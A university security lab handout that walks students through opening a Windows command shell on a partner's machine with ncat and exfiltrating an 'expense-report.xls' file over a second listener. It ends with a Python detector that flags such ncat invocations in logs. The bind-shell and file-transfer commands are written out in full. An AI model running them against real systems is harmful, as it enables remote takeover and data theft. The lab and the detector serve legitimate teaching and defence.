Shell lab SP17 DBGrevised (1)
Getting a command (CMD) shell
Objective: Understand how an Advanced Persistent Threat (APT) gains access into a corporate network.
Scenario: Two systems that can directly communicate with each other on an arbitrary port (i.e. there is no firewall or other device preventing them from communicating directly with each other). Alice is the victim and Eve is the attacker, so one of you will be Alice for the duration of the assignment and the other one Eve. When the first person is done, switch roles.
Preparation:
Ensure the two Windows workstations can ping each other.
Make a note of each other’s IP address.
192.168.3.27
Download and install Nmap (ncat is included with it).
Start a command prompt (cmd.exe)
Change directory to the nmap install dir (cd “C:\Program Files (x86)\Nmap”)
On each system (i.e. both Alice and Eve), type hostname at the command prompt so you know the hostname of each.
On Alice’s computer, a listener (-l) (lower case L) is started on port 8001, and anyone that connects to it will get a command prompt on Alice's computer. The -v is for verbose mode. It is always a good option so you know what is going on as the shell is being set up.
Alice (on Windows): ncat -l 8001 -e cmd.exe -v
Eve connects to Alice's computer on port 8001.
ncat X.X.X.X 8001 (replace X.X.X.X with the IP address of Alice’s computer.)
Eve should now see something like this:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Alice
Eve is now logged into Alice's system and can type commands as if they were sitting in front of her computer.
Run the command: hostname
You should see the computer name of the Windows system. Additionally, the command:
ipconfig /all should display the IP address of your partner's Windows system.
Optional DATA EXFILTRATION
Objective: Understand how an Advanced Persistent Threat (APT) exfiltrates (retrieves) data from an organization.
Scenario: Assume two systems can directly communicate with each other on an arbitrary port (i.e. there is no firewall or other device preventing them from communicating directly with each other). Alice is the victim and Eve is the attacker.
Attackers often browse around the computer system and compress and transfer files to a remote system. This demonstrates that capability using NCAT.
Preparation: Re-establish a shell on your partner’s system (from the previous lab).
Alice: Download the “expense-report.xls” file from Canvas and save it to the Downloads folder, which is the default location.
Eve should have an ncat session open on Alice’s host (from the previous lab). Using access to Alice’s cmd, Eve is going to start a second ncat listener on Alice’s computer on port 4000.
Eve (run this command on Alice’s computer):
ncat -vv -l 4000 --send-only < %USERPROFILE%\Downloads\expense-report.xls
The < is a redirect indicating that when someone connects they will be sent the file.
%USERPROFILE% substitutes the user home directory path
Eve: Open a new command prompt on your workstation and run the commands:
Browse to your Downloads directory
Type dir to see the contents
In the output of the “dir” command above, look for the expense-report.xls file before running the command below. It should not be there yet:
Eve: ncat -vv host1 4000 > expense-report.xls (Replace “host1” with the IP address of Alice’s workstation.). This will connect to the new server at port 4000 and redirect the file to Eve’s computer.
Eve: Browse to your Downloads folder and check that you see the “expense-report.xls” file AND can open it.
Using the backdoor connection to Alice’s computer, Eve was able to open a second connection that she could use to transfer files out of Alice’s computer.
INFORMATIONAL ONLY: Always specify a port number. Otherwise, ncat will default to using port 31337. That is a well-known Trojan port, and an Intrusion Detection System or firewall may alert on it. The type of attackers that ‘persist’ in networks hide their existence.
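As an added example that is not part of the lab handout, the following Python script shows the defender's side of both exercises (the bind shell and the file transfer) and of the port 31337 note: it reads process-creation style log lines and flags ncat invocations that hand the connection to a program (-e), serve a file (--send-only or <), write the connection to a file (>), or rely on the 31337 default. The log line format, the hostnames ALICE-PC and EVE-PC, and the address 192.0.2.10 are constructed for the example and are not from the lab.

```python
import re
from dataclasses import dataclass, field

# Process names commonly seen for Nmap's ncat and its netcat relatives.
NCAT_NAMES = {"ncat", "ncat.exe", "nc", "nc.exe", "netcat", "netcat.exe"}
# Port ncat falls back to when none is given (see the note in the lab text).
DEFAULT_NCAT_PORT = 31337


@dataclass
class Finding:
    host: str
    command_line: str
    rules: list = field(default_factory=list)


def parse_event(line: str):
    """Pull Host and CommandLine out of one constructed key=value log line.
    Returns (host, command_line), or None when the line is not a process event."""
    m = re.search(r'Host=(\S+).*?CommandLine="([^"]*)"', line)
    if not m:
        return None
    return m.group(1), m.group(2)


def ncat_port(args):
    """Return the port ncat would use: the first purely numeric argument,
    or the 31337 default when none is present."""
    for a in args:
        if a.isdigit():
            return int(a)
    return DEFAULT_NCAT_PORT


def analyze_command_line(command_line: str):
    """Return the rule names an ncat invocation triggers
    (empty if the command is not ncat or looks unremarkable)."""
    tokens = command_line.split()
    if not tokens:
        return []
    # Strip any directory part so "C:\...\ncat.exe" and "ncat" compare equal.
    exe = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in NCAT_NAMES:
        return []
    args = tokens[1:]
    listening = "-l" in args or "--listen" in args
    rules = []
    if any(a in ("-e", "--exec", "-c", "--sh-exec") for a in args):
        rules.append("exec: ncat hands the connection to a program (remote shell)")
    if "--send-only" in args or "<" in args:
        rules.append("send-file: ncat serves a file to whoever connects")
    if ">" in args and not listening:
        rules.append("receive-file: ncat writes the remote side into a file")
    if ncat_port(args) == DEFAULT_NCAT_PORT:
        rules.append("default-port: no port given, ncat falls back to 31337")
    if listening and not rules:
        rules.append("listener: ncat bound to a port with no known purpose")
    return rules


def scan(lines):
    """Run analyze_command_line over every parseable event and collect findings."""
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        host, cmd = parsed
        rules = analyze_command_line(cmd)
        if rules:
            findings.append(Finding(host, cmd, rules))
    return findings


# Constructed sample events mirroring the lab's commands as typed, plus benign noise.
SAMPLE_EVENTS = [
    'Host=ALICE-PC Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe"',
    'Host=ALICE-PC Image=C:\\Program Files (x86)\\Nmap\\ncat.exe CommandLine="ncat -l 8001 -e cmd.exe -v"',
    'Host=EVE-PC Image=C:\\Program Files (x86)\\Nmap\\ncat.exe CommandLine="ncat 192.0.2.10 8001"',
    'Host=ALICE-PC Image=C:\\Program Files (x86)\\Nmap\\ncat.exe CommandLine="ncat -vv -l 4000 --send-only < %USERPROFILE%\\Downloads\\expense-report.xls"',
    'Host=EVE-PC Image=C:\\Program Files (x86)\\Nmap\\ncat.exe CommandLine="ncat -vv 192.0.2.10 4000 > expense-report.xls"',
    'Host=EVE-PC Image=C:\\Program Files (x86)\\Nmap\\ncat.exe CommandLine="ncat 192.0.2.10"',
    'Host=ALICE-PC Image=C:\\Windows\\System32\\ipconfig.exe CommandLine="ipconfig /all"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.command_line}")
        for r in f.rules:
            print(f"    {r}")
```

Two things the sample output makes visible. First, the plain client connection (`ncat 192.0.2.10 8001`) is not flagged at all: from the command line alone it is indistinguishable from any other network client, so catching that side of the exchange needs network telemetry (an unexpected listening port on Alice's machine, or a connection from one workstation to another on port 8001) rather than process logs. Second, the sample lines carry the redirect operators because they record the commands as typed; on a real Windows host the `<` and `>` are handled by cmd.exe, so a process-creation log for ncat.exe itself will not show them and the rule would have to look at the parent cmd.exe command line instead.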